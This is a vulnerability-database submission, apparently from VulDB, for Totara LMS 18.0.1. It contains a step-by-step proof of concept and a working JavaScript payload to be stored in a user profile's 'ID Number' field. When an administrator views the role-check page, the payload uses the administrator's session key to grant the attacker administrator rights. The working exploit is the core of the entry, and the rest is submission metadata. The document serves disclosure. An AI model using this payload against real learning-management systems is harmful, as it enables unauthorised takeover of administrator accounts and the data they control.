| 제목 | Totara Totara LMS Totara 18.0.1 (Build: 20231128.01) Privileges Scalation |
|---|
| 설명 | # Exploit Title: CSRF Privileges Scalation Totara 18.0.1
# Date: 2024-04-10
# Author: Patricio Alejandro Moraga Abarca (RREEDD) and Juan Carlos Garcés Bernt (DeBobiPro)
# Category : webapps
# Tested on: Totara 18.0.1 (Build: 20231128.01)
# Proof Of Concept:
1. In your user profile modify the "ID Number" variable by entering the payload.
2. The payload will be executed by the administrator when visiting the site "admin/roles/check.php", making the profile defined in the administrator payload.
# Payload
<script>const http = new XMLHttpRequest(); http.open("POST", "/admin/roles/admins.php", false); http.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); http.send("confirmadd=<USER ID>&sesskey="+M.cfg.sesskey);</script>
#The <USER ID> field must be modified by the value of your user.
#The variable "sesskey", is unique to each login, so we get it dynamically with the call to the object "M.cfg.sesskey". |
|---|
| 사용자 | Anonymous User |
|---|
| 제출 | 2024. 04. 10. PM 07:35 (2 연령 ago) |
|---|
| 모더레이션 | 2024. 04. 17. PM 06:58 (7 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 261369 [Totara LMS 까지 18.7 User Selector 교차 사이트 요청 위조] |
|---|
| 포인트들 | 17 |
|---|